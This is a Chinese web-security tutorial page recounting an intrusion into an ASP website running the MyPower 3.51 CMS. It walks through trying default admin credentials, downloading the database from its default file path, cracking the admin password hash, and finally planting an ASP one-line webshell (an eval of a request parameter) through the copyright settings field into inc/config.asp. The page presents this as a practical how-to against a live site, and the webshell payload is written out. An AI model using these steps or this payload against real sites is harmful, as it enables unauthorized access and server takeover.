网站地图    收藏   

主页 > 后端 > 网站安全 >

MyPower3.5(动力)渗透&后台拿shell方法 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 是个ASP站点.随便点了个连接习惯性的加个#39;结果提示处理URL时服务器出错。请与系统管理员联系。看来是使用了某个防注射系统.用啊D扫了一下也没有发现注射点.有些叉子们可能看到没...

是个ASP站点.随便点了个连接习惯性的加个'结果提示处理URL时服务器出错。请与系统管理员联系。看来是使用了某个防注射系统.

\

用啊D扫了一下也没有发现注射点.有些叉子们可能看到没有注射点就会放弃了.其实不然我们还有N种办法来搞定他.既然没注射点那我们来看看他的后台..用啊D扫出了几个后台打开一看原来是Power 3.51的也就是动力系统。

\

试着用默认密码admin, admin888登陆提示密码错误...估计管理员也不会这么白痴.

\

现在又不能注入.默认密码又不对。一时间有点不知所措了.过了一会突然想到MY动力3.51以前自己架设过。看能不能用默认的数据库地址下到他的数据库文件.说干就干。赶紧到网上重新下了一份Power 3.51,因为MY动力的数据库文件名超级长.我也记不住..很快找到默认的数据库路径Database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb. www.2cto.com.看吧要不是先下了一份谁记的住这么长的名字,果然。事实再一次证明了我的RP非常好..管理员虽然用了防注射代码.但是却没改数据库的路径.

\

打开数据库.Admin表发现只有一个fxysonic用户想必就是那个超级管理员了.

\

马上找到www.cmd5.com顺利搞定密码登陆后台.

\

再一次见到了MY动力后台.相信看过7期杂志的朋友们一定看过了天空-坏孩子的那篇文章《自立更生搞定MY动力后台》.我们用他的办法试了一下.首先使用空壳数据库.就是我刚下载的那套Power系统只留一个Admin表其余的都删掉.然后我们首先备份数据库记下地址.

\

为的是一会恢复数据库,然后我们在添加文章那里把那个改过后的数据库文件改成jpg的形式上传 记下地址.

\

然后我们点恢复数据库.在地址里添UploadThumbs/2007829223819242.jpg我们刚记下的路径.然后再备份就会出现新的登陆框了..相信大家都看了那篇文章..但是我实验了N次都没有成功..而且还把网站搞毁了好几次..不知道是不是我RP不好的毛病又犯了,既然别人的方法不行那我们就自己来搞定他.在Q上问了几个朋友有人说在版权信息那里没有字符限制可以传一个类似小马的东西..并传了一份代码给我.我马上本地测试还真的成功了 继续回到目标站点找到版权信息那里.

\

把那里替换成
版权所有 Copyright? 2003 <a href=' if Request("hx")<>"" then
eval(request("hx"))
end if
%>
<%const hx="

 

<p "="">inc/config.asp访问一句话木马


本文由左泪发表在三年离歌

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论